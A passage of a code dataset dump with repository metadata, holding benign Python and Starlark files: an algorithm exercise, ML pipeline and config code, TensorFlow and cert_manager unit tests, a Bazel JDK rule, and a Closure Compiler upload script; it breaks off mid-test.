max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5)
---|---|---|---|---|---|---|
coding patterns/two pointers/sortedarr_square.py | mkoryor/Python | 0 | 4900 | <filename>coding patterns/two pointers/sortedarr_square.py
"""
[E] Given a sorted array, create a new array containing the squares of all the
numbers of the input array, in sorted order.
Input: [-2, -1, 0, 2, 3]
Output: [0, 1, 4, 4, 9]
"""
# Time: O(N), Space: O(N)
def make_squares(arr):
n = len(arr)
squares = [0 for x in range(n)]
highestSquareIdx = n - 1
left, right = 0, n - 1
while left <= right:
leftSquare = arr[left] * arr[left]
rightSquare = arr[right] * arr[right]
if leftSquare > rightSquare:
squares[highestSquareIdx] = leftSquare
left += 1
else:
squares[highestSquareIdx] = rightSquare
right -= 1
highestSquareIdx -= 1
return squares
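# Quick illustrative check of the function above:
# make_squares([-2, -1, 0, 2, 3]) returns [0, 1, 4, 4, 9]
print(make_squares([-2, -1, 0, 2, 3]))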
| 3.890625 | 4 |
modules/evaluate/evaluate_step.py | Azure/aml-object-classification-pipeline | 5 | 4901 | import os
from azureml.pipeline.steps import PythonScriptStep
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
from azureml.pipeline.core import PipelineData
from azureml.pipeline.core import PipelineParameter
from azureml.pipeline.steps import EstimatorStep
from azureml.train.dnn import PyTorch
def evaluate_step(model_dir, test_dir, compute_target):
'''
This step evaluates the trained model on the testing data and outputs the accuracy.
:param model_dir: The reference to the directory containing the trained model
:type model_dir: DataReference
:param test_dir: The reference to the directory containing the testing data
:type test_dir: DataReference
:param compute_target: The compute target to run the step on
:type compute_target: ComputeTarget
:return: The evaluate step, step outputs dictionary (keys: accuracy_file)
:rtype: EstimatorStep, dict
'''
accuracy_file = PipelineData(
name='accuracy_file',
pipeline_output_name='accuracy_file',
datastore=test_dir.datastore,
output_mode='mount',
is_directory=False)
outputs = [accuracy_file]
outputs_map = { 'accuracy_file': accuracy_file }
estimator = PyTorch(
source_directory=os.path.dirname(os.path.abspath(__file__)),
entry_script='evaluate.py',
framework_version='1.3',
compute_target=compute_target,
use_gpu=True)
step = EstimatorStep(
name="Evaluate Model",
estimator=estimator,
estimator_entry_script_arguments=[
'--test_dir', test_dir,
'--model_dir', model_dir,
'--accuracy_file', accuracy_file
],
inputs=[model_dir, test_dir],
outputs=outputs,
compute_target=compute_target,
allow_reuse=True)
return step, outputs_map
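# Hypothetical wiring of this step into a pipeline, shown only as a sketch. The
# workspace config, the compute target name "gpu-cluster" and the datastore paths
# below are assumptions, not part of this repository.
from azureml.core import Workspace
from azureml.data.data_reference import DataReference
from azureml.pipeline.core import Pipeline
from modules.evaluate.evaluate_step import evaluate_step

ws = Workspace.from_config()
datastore = ws.get_default_datastore()
model_dir = DataReference(datastore=datastore, data_reference_name='model_dir', path_on_datastore='models')
test_dir = DataReference(datastore=datastore, data_reference_name='test_dir', path_on_datastore='data/test')
step, outputs = evaluate_step(model_dir, test_dir, ws.compute_targets['gpu-cluster'])
pipeline = Pipeline(workspace=ws, steps=[step])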
| 2.359375 | 2 |
configs/mobilenet_cfbi.py | yoxu515/CFBI | 312 | 4902 | import torch
import argparse
import os
import sys
import cv2
import time
class Configuration():
def __init__(self):
self.EXP_NAME = 'mobilenetv2_cfbi'
self.DIR_ROOT = './'
self.DIR_DATA = os.path.join(self.DIR_ROOT, 'datasets')
self.DIR_DAVIS = os.path.join(self.DIR_DATA, 'DAVIS')
self.DIR_YTB = os.path.join(self.DIR_DATA, 'YTB/train')
self.DIR_YTB_EVAL = os.path.join(self.DIR_DATA, 'YTB/valid')
self.DIR_RESULT = os.path.join(self.DIR_ROOT, 'result', self.EXP_NAME)
self.DIR_CKPT = os.path.join(self.DIR_RESULT, 'ckpt')
self.DIR_LOG = os.path.join(self.DIR_RESULT, 'log')
self.DIR_IMG_LOG = os.path.join(self.DIR_RESULT, 'log', 'img')
self.DIR_TB_LOG = os.path.join(self.DIR_RESULT, 'log', 'tensorboard')
self.DIR_EVALUATION = os.path.join(self.DIR_RESULT, 'eval')
self.DATASETS = ['youtubevos']
self.DATA_WORKERS = 4
self.DATA_RANDOMCROP = (465, 465)
self.DATA_RANDOMFLIP = 0.5
self.DATA_MAX_CROP_STEPS = 5
self.DATA_MIN_SCALE_FACTOR = 1.
self.DATA_MAX_SCALE_FACTOR = 1.3
self.DATA_SHORT_EDGE_LEN = 480
self.DATA_RANDOM_REVERSE_SEQ = True
self.DATA_DAVIS_REPEAT = 30
self.DATA_CURR_SEQ_LEN = 3
self.DATA_RANDOM_GAP_DAVIS = 3
self.DATA_RANDOM_GAP_YTB = 3
self.PRETRAIN = True
self.PRETRAIN_FULL = False
self.PRETRAIN_MODEL = './pretrain_models/mobilenetv2-deeplabv3p.pth.tar'
self.MODEL_BACKBONE = 'mobilenet'
self.MODEL_MODULE = 'networks.cfbi.cfbi'
self.MODEL_OUTPUT_STRIDE = 16
self.MODEL_ASPP_OUTDIM = 256
self.MODEL_SHORTCUT_DIM = 48
self.MODEL_SEMANTIC_EMBEDDING_DIM = 100
self.MODEL_HEAD_EMBEDDING_DIM = 256
self.MODEL_PRE_HEAD_EMBEDDING_DIM = 64
self.MODEL_GN_GROUPS = 32
self.MODEL_GN_EMB_GROUPS = 25
self.MODEL_MULTI_LOCAL_DISTANCE = [2, 4, 6, 8, 10, 12]
self.MODEL_LOCAL_DOWNSAMPLE = True
self.MODEL_REFINE_CHANNELS = 64 # n * 32
self.MODEL_LOW_LEVEL_INPLANES = 256 if self.MODEL_BACKBONE == 'resnet' else 24
self.MODEL_RELATED_CHANNELS = 64
self.MODEL_EPSILON = 1e-5
self.MODEL_MATCHING_BACKGROUND = True
self.MODEL_GCT_BETA_WD = True
self.MODEL_FLOAT16_MATCHING = True
self.MODEL_FREEZE_BN = True
self.MODEL_FREEZE_BACKBONE = False
self.TRAIN_TOTAL_STEPS = 100000
self.TRAIN_START_STEP = 0
self.TRAIN_LR = 0.01
self.TRAIN_MOMENTUM = 0.9
self.TRAIN_COSINE_DECAY = False
self.TRAIN_WARM_UP_STEPS = 1000
self.TRAIN_WEIGHT_DECAY = 15e-5
self.TRAIN_POWER = 0.9
self.TRAIN_GPUS = 4
self.TRAIN_BATCH_SIZE = 8
self.TRAIN_START_SEQ_TRAINING_STEPS = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_TBLOG = False
self.TRAIN_TBLOG_STEP = 60
self.TRAIN_LOG_STEP = 20
self.TRAIN_IMG_LOG = False
self.TRAIN_TOP_K_PERCENT_PIXELS = 0.15
self.TRAIN_HARD_MINING_STEP = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_CLIP_GRAD_NORM = 5.
self.TRAIN_SAVE_STEP = 1000
self.TRAIN_MAX_KEEP_CKPT = 8
self.TRAIN_RESUME = False
self.TRAIN_RESUME_CKPT = None
self.TRAIN_RESUME_STEP = 0
self.TRAIN_AUTO_RESUME = True
self.TRAIN_GLOBAL_ATROUS_RATE = 1
self.TRAIN_LOCAL_ATROUS_RATE = 1
self.TRAIN_GLOBAL_CHUNKS = 20
self.TRAIN_DATASET_FULL_RESOLUTION = True
self.TEST_GPU_ID = 0
self.TEST_DATASET = 'youtubevos'
self.TEST_DATASET_FULL_RESOLUTION = False
self.TEST_DATASET_SPLIT = ['val']
self.TEST_CKPT_PATH = None
self.TEST_CKPT_STEP = None # if "None", evaluate the latest checkpoint.
self.TEST_FLIP = False
self.TEST_MULTISCALE = [1]
self.TEST_MIN_SIZE = None
self.TEST_MAX_SIZE = 800 * 1.3 if self.TEST_MULTISCALE == [1] else 800
self.TEST_WORKERS = 4
self.TEST_GLOBAL_CHUNKS = 4
self.TEST_GLOBAL_ATROUS_RATE = 2
self.TEST_LOCAL_ATROUS_RATE = 1
# dist
self.DIST_ENABLE = True
self.DIST_BACKEND = "gloo"
self.DIST_URL = "file://./sharefile"
self.DIST_START_GPU = 0
self.__check()
def __check(self):
if not torch.cuda.is_available():
raise ValueError('config.py: cuda is not available')
if self.TRAIN_GPUS == 0:
raise ValueError('config.py: the number of GPU is 0')
for path in [self.DIR_RESULT, self.DIR_CKPT, self.DIR_LOG, self.DIR_EVALUATION, self.DIR_IMG_LOG, self.DIR_TB_LOG]:
if not os.path.isdir(path):
os.makedirs(path)
cfg = Configuration()
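# Illustrative use of the module-level singleton above (the import path assumes the
# CFBI repository layout); note that constructing Configuration() requires a CUDA
# device and creates the result/ckpt/log/eval directories as a side effect:
# from configs.mobilenet_cfbi import cfg
# print(cfg.EXP_NAME, cfg.DIR_CKPT, cfg.TRAIN_BATCH_SIZE)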
| 2.0625 | 2 |
js/matrixjs/matrix_compile.py | kennytilton/ConnectJS | 7 | 4903 | <gh_stars>1-10
#!/usr/bin/python2.4
import httplib, urllib, sys
# Define the parameters for the POST request and encode them in
# a URL-safe format.
params = urllib.urlencode([
#('js_code', sys.argv[1]),
('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Cells.js'),
('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Model.js'),
('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Tag.js'),
('compilation_level', 'ADVANCED_OPTIMIZATIONS'),
('output_format', 'text'),
('output_info', 'warnings'),
])
# Always use the following value for the Content-type header.
headers = { "Content-type": "application/x-www-form-urlencoded" }
conn = httplib.HTTPConnection('closure-compiler.appspot.com')
conn.request('POST', '/compile', params, headers)
response = conn.getresponse()
data = response.read()
print data
conn.close() | 2.546875 | 3 |
tensorflow/python/util/tf_should_use_test.py | npow/tensorflow | 0 | 4904 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tf_should_use."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import sys
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util import tf_should_use
@contextlib.contextmanager
def reroute_error():
"""Temporarily reroute errors written to tf_logging.error into `captured`."""
with test.mock.patch.object(tf_should_use.tf_logging, 'error') as error:
with test.mock.patch.object(tf_should_use.tf_logging, 'fatal') as fatal:
yield error, fatal
class TfShouldUseTest(test.TestCase):
def testAddShouldUseWarningWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c)
del h
with reroute_error() as (error, _):
in_this_function()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def testAddShouldUseFatalWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c, fatal_error=True)
del h
with reroute_error() as (_, fatal):
in_this_function()
fatal.assert_called()
msg = '\n'.join(fatal.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def _testAddShouldUseWarningWhenUsed(self, fn, name):
c = constant_op.constant(0, name=name)
with reroute_error() as (error, fatal):
h = tf_should_use._add_should_use_warning(c)
fn(h)
del h
error.assert_not_called()
fatal.assert_not_called()
def testAddShouldUseWarningWhenUsedWithAdd(self):
def add(h):
_ = h + 1
self._testAddShouldUseWarningWhenUsed(add, name='blah_add')
gc.collect()
self.assertFalse(gc.garbage)
def testAddShouldUseWarningWhenUsedWithGetName(self):
def get_name(h):
_ = h.name
self._testAddShouldUseWarningWhenUsed(get_name, name='blah_get_name')
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResult(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah2')
with reroute_error() as (error, _):
return_const(0.0)
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah2:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResultWhenNotReallyUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with reroute_error() as (error, _):
with self.test_session():
return_const(0.0)
# Creating another op and executing it does not mark the
# unused op as being "used".
v = constant_op.constant(1.0, name='meh')
v.eval()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah3:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
# Tests that mark_used is available in the API.
def testMarkUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with self.test_session():
return_const(0.0).mark_used()
if __name__ == '__main__':
test.main()
| 1.734375 | 2 |
tools/jdk/local_java_repository.bzl | loongarch64/bazel | 16,989 | 4905 | <reponame>loongarch64/bazel
# Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules for importing and registering a local JDK."""
load(":default_java_toolchain.bzl", "JVM8_TOOLCHAIN_CONFIGURATION", "default_java_toolchain")
def _detect_java_version(repository_ctx, java_bin):
properties_out = repository_ctx.execute([java_bin, "-XshowSettings:properties"]).stderr
# This returns an indented list of properties separated with newlines:
# " java.vendor.url.bug = ... \n"
# " java.version = 11.0.8\n"
# " java.version.date = 2020-11-05\"
strip_properties = [property.strip() for property in properties_out.splitlines()]
version_property = [property for property in strip_properties if property.startswith("java.version = ")]
if len(version_property) != 1:
return None
version_value = version_property[0][len("java.version = "):]
parts = version_value.split(".")
major = parts[0]
if len(parts) == 1:
return major
elif major == "1": # handles versions below 1.8
minor = parts[1]
return minor
return major
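# Worked examples of the version parsing above (values are illustrative):
#   "java.version = 11.0.8"    -> parts = ["11", "0", "8"],    returns "11"
#   "java.version = 1.8.0_292" -> parts = ["1", "8", "0_292"], returns "8" (pre-1.9 handling)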
def local_java_runtime(name, java_home, version, runtime_name = None, visibility = ["//visibility:public"]):
"""Defines a java_runtime target together with Java runtime and compile toolchain definitions.
Java runtime toolchain is constrained by flag --java_runtime_version having
value set to either name or version argument.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation. This requires a different configuration for JDK8
than the newer versions.
Args:
name: name of the target.
java_home: Path to the JDK.
version: Version of the JDK.
runtime_name: name of java_runtime target if it already exists.
visibility: Visibility that will be applied to the java runtime target
"""
if runtime_name == None:
runtime_name = name
native.java_runtime(
name = runtime_name,
java_home = java_home,
visibility = visibility,
)
native.config_setting(
name = name + "_name_setting",
values = {"java_runtime_version": name},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_version_setting",
values = {"java_runtime_version": version},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_name_version_setting",
values = {"java_runtime_version": name + "_" + version},
visibility = ["//visibility:private"],
)
native.alias(
name = name + "_settings_alias",
actual = select({
name + "_name_setting": name + "_name_setting",
name + "_version_setting": name + "_version_setting",
"//conditions:default": name + "_name_version_setting",
}),
visibility = ["//visibility:private"],
)
native.toolchain(
name = "runtime_toolchain_definition",
target_settings = [":%s_settings_alias" % name],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = runtime_name,
)
if version == "8":
default_java_toolchain(
name = name + "_toolchain_java8",
configuration = JVM8_TOOLCHAIN_CONFIGURATION,
source_version = version,
target_version = version,
java_runtime = runtime_name,
)
elif type(version) == type("") and version.isdigit() and int(version) > 8:
for version in range(8, int(version) + 1):
default_java_toolchain(
name = name + "_toolchain_java" + str(version),
source_version = str(version),
target_version = str(version),
java_runtime = runtime_name,
)
# else version is not recognized and no compilation toolchains are predefined
def _local_java_repository_impl(repository_ctx):
"""Repository rule local_java_repository implementation.
Args:
repository_ctx: repository context
"""
java_home = repository_ctx.attr.java_home
java_home_path = repository_ctx.path(java_home)
if not java_home_path.exists:
fail(('The path indicated by the "java_home" attribute "%s" (absolute: "%s") ' +
"does not exist.") % (java_home, str(java_home_path)))
repository_ctx.file(
"WORKSPACE",
"# DO NOT EDIT: automatically generated WORKSPACE file for local_java_repository\n" +
"workspace(name = \"{name}\")\n".format(name = repository_ctx.name),
)
extension = ".exe" if repository_ctx.os.name.lower().find("windows") != -1 else ""
java_bin = java_home_path.get_child("bin").get_child("java" + extension)
if not java_bin.exists:
# Java binary does not exist
repository_ctx.file(
"BUILD.bazel",
_NOJDK_BUILD_TPL.format(
local_jdk = repository_ctx.name,
java_binary = "bin/java" + extension,
java_home = java_home,
),
False,
)
return
# Detect version
version = repository_ctx.attr.version if repository_ctx.attr.version != "" else _detect_java_version(repository_ctx, java_bin)
# Prepare BUILD file using "local_java_runtime" macro
build_file = ""
if repository_ctx.attr.build_file != None:
build_file = repository_ctx.read(repository_ctx.path(repository_ctx.attr.build_file))
runtime_name = '"jdk"' if repository_ctx.attr.build_file else None
local_java_runtime_macro = """
local_java_runtime(
name = "%s",
runtime_name = %s,
java_home = "%s",
version = "%s",
)
""" % (repository_ctx.name, runtime_name, java_home, version)
repository_ctx.file(
"BUILD.bazel",
'load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_runtime")\n' +
build_file +
local_java_runtime_macro,
)
# Symlink all files
for file in repository_ctx.path(java_home).readdir():
repository_ctx.symlink(file, file.basename)
# Build file template, when JDK does not exist
_NOJDK_BUILD_TPL = '''load("@bazel_tools//tools/jdk:fail_rule.bzl", "fail_rule")
fail_rule(
name = "jdk",
header = "Auto-Configuration Error:",
message = ("Cannot find Java binary {java_binary} in {java_home}; either correct your JAVA_HOME, " +
"PATH or specify Java from remote repository (e.g. " +
"--java_runtime_version=remotejdk_11")
)
config_setting(
name = "localjdk_setting",
values = {{"java_runtime_version": "{local_jdk}"}},
visibility = ["//visibility:private"],
)
toolchain(
name = "runtime_toolchain_definition",
target_settings = [":localjdk_setting"],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = ":jdk",
)
'''
_local_java_repository_rule = repository_rule(
implementation = _local_java_repository_impl,
local = True,
configure = True,
attrs = {
"java_home": attr.string(),
"version": attr.string(),
"build_file": attr.label(),
},
)
def local_java_repository(name, java_home, version = "", build_file = None):
"""Registers a runtime toolchain for local JDK and creates an unregistered compile toolchain.
Toolchain resolution is constrained with --java_runtime_version flag
having value of the "name" or "version" parameter.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation.
If there is no JDK, "virtual" targets are created, which fail only when actually needed.
Args:
name: A unique name for this rule.
java_home: Location of the JDK imported.
build_file: optionally BUILD file template
version: optionally java version
"""
_local_java_repository_rule(name = name, java_home = java_home, version = version, build_file = build_file)
native.register_toolchains("@" + name + "//:runtime_toolchain_definition")
| 1.960938 | 2 |
corehq/apps/fixtures/resources/v0_1.py | SEL-Columbia/commcare-hq | 1 | 4906 | from couchdbkit import ResourceNotFound
from tastypie import fields as tp_f
from corehq.apps.api.resources import JsonResource
from corehq.apps.api.resources.v0_1 import (
CustomResourceMeta,
RequirePermissionAuthentication,
)
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.users.models import Permissions
def convert_fdt(fdi):
try:
fdt = FixtureDataType.get(fdi.data_type_id)
fdi.fixture_type = fdt.tag
return fdi
except ResourceNotFound:
return fdi
class FixtureResource(JsonResource):
type = "fixture"
fields = tp_f.DictField(attribute='try_fields_without_attributes',
readonly=True, unique=True)
# when null, that means the ref'd fixture type was not found
fixture_type = tp_f.CharField(attribute='fixture_type', readonly=True,
null=True)
id = tp_f.CharField(attribute='_id', readonly=True, unique=True)
def obj_get(self, bundle, **kwargs):
return convert_fdt(get_object_or_not_exist(
FixtureDataItem, kwargs['pk'], kwargs['domain']))
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
parent_id = bundle.request.GET.get("parent_id", None)
parent_ref_name = bundle.request.GET.get("parent_ref_name", None)
references = bundle.request.GET.get("references", None)
child_type = bundle.request.GET.get("child_type", None)
type_id = bundle.request.GET.get("fixture_type_id", None)
type_tag = bundle.request.GET.get("fixture_type", None)
if parent_id and parent_ref_name and child_type and references:
parent_fdi = FixtureDataItem.get(parent_id)
fdis = list(
FixtureDataItem.by_field_value(
domain, child_type, parent_ref_name,
parent_fdi.fields_without_attributes[references])
)
elif type_id or type_tag:
type_id = type_id or FixtureDataType.by_domain_tag(
domain, type_tag).one()
fdis = list(FixtureDataItem.by_data_type(domain, type_id))
else:
fdis = list(FixtureDataItem.by_domain(domain))
return [convert_fdt(fdi) for fdi in fdis] or []
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_apps)
object_class = FixtureDataItem
resource_name = 'fixture'
limit = 0
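# Illustrative queries this resource accepts, based on the GET parameters read in
# obj_get_list above (the URL prefix depends on how the API is routed and is an assumption):
#   GET .../fixture/                        -> all fixture data items in the domain
#   GET .../fixture/?fixture_type=city      -> items of the data type tagged "city"
#   GET .../fixture/?fixture_type_id=<id>   -> items of a specific data type id
#   GET .../fixture/?parent_id=<id>&parent_ref_name=<field>&references=<field>&child_type=<tag>
#                                           -> child items referencing a parent item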
| 1.945313 | 2 |
tests/test_domain.py | broadinstitute/cert_manager_api | 0 | 4907 | # -*- coding: utf-8 -*-
"""Define the cert_manager.domain.Domain unit tests."""
# Don't warn about things that happen as that is part of unit testing
# pylint: disable=protected-access
# pylint: disable=no-member
import json
from requests.exceptions import HTTPError
from testtools import TestCase
import responses
from cert_manager.domain import Domain, DomainCreationResponseError
from .lib.testbase import ClientFixture
class TestDomain(TestCase): # pylint: disable=too-few-public-methods
"""Serve as a Base class for all tests of the Domain class."""
def setUp(self): # pylint: disable=invalid-name
"""Initialize the class."""
# Call the inherited setUp method
super().setUp()
# Make sure the Client fixture is created and setup
self.cfixt = self.useFixture(ClientFixture())
self.client = self.cfixt.client
self.api_url = f"{self.cfixt.base_url}/domain/v1"
# Setup a test response one would expect normally
self.valid_response = [
{"id": 1234, "name": "example.com"},
{"id": 4321, "name": "*.example.com"},
{"id": 4322, "name": "subdomain.example.com"},
]
# Setup a test response for getting a specific Domain
self.valid_individual_response = self.valid_response[0]
self.valid_individual_response["status"] = "Active"
# Setup JSON to return in an error
self.error_response = {"description": "domain error"}
class TestInit(TestDomain):
"""Test the class initializer."""
@responses.activate
def test_param(self):
"""The URL should change if api_version is passed as a parameter."""
# Set a new version
version = "v3"
api_url = f"{self.cfixt.base_url}/domain/{version}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client, api_version=version)
data = domain.all()
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response)
def test_need_client(self):
"""The class should raise an exception without a client parameter."""
self.assertRaises(TypeError, Domain)
class TestAll(TestDomain):
"""Test the .all method."""
@responses.activate
def test_cached(self):
"""The function should return all the data, but should not query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all()
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_forced(self):
"""The function should return all the data, but should query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all(force=True)
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(responses.calls[1].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.all)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestFind(TestDomain):
"""Test the .find method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will return all domains"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.find()
self.assertEqual(data, self.valid_response)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200)
api_url = f"{self.api_url}?name=example.com"
domain = Domain(client=self.client)
data = domain.find(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response[0])
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.find)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestCount(TestDomain):
"""Test the .count method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will count all domains"""
# Setup the mocked response
count = {"count": len(self.valid_response)}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count()
self.assertEqual(data, count)
self.assertEqual(responses.calls[0].request.url, api_url)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
count = {"count": len(self.valid_response[0])}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com")
self.assertEqual(data, count)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if counts cannot be retrieved from the API."""
# Setup the mocked response
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.count)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
class TestGet(TestDomain):
"""Test the .get method."""
@responses.activate
def test_need_domain_id(self):
"""The function should raise an exception without an domain_id parameter."""
domain = Domain(client=self.client)
self.assertRaises(TypeError, domain.get)
@responses.activate
def test_domain_id(self):
"""The function should return data about the specified Domain ID."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200)
domain = Domain(client=self.client)
data = domain.get(domain_id)
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_individual_response)
@responses.activate
def test_ne_domain_id(self):
"""The function should raise an HTTPError exception if the specified Domain ID does not exist."""
domain_id = 2345
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.get, domain_id)
class TestCreate(TestDomain):
"""Test the .create method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# Not going to check every permutation of missing parameters,
# but verify that something is required
self.assertRaises(TypeError, domain.create)
@responses.activate
def test_create_success(self):
"""
The function should return the created domain ID,
as well as add all parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
org_id = 4321
types = ["SSL"]
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": org_id, "certTypes": types}]
}
response = domain.create("sub2.example.com", org_id, types)
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_success_optional_params(self):
"""
The function should return the created domain ID when additional params are specified,
as well add the non-required parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": 4321, "certTypes": ["SSL"]}],
"description": "Example sub domain"
}
response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain")
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_failure_http_error(self):
"""
The function should return an error code and description if the Domain
creation failed.
"""
# Setup the mocked response
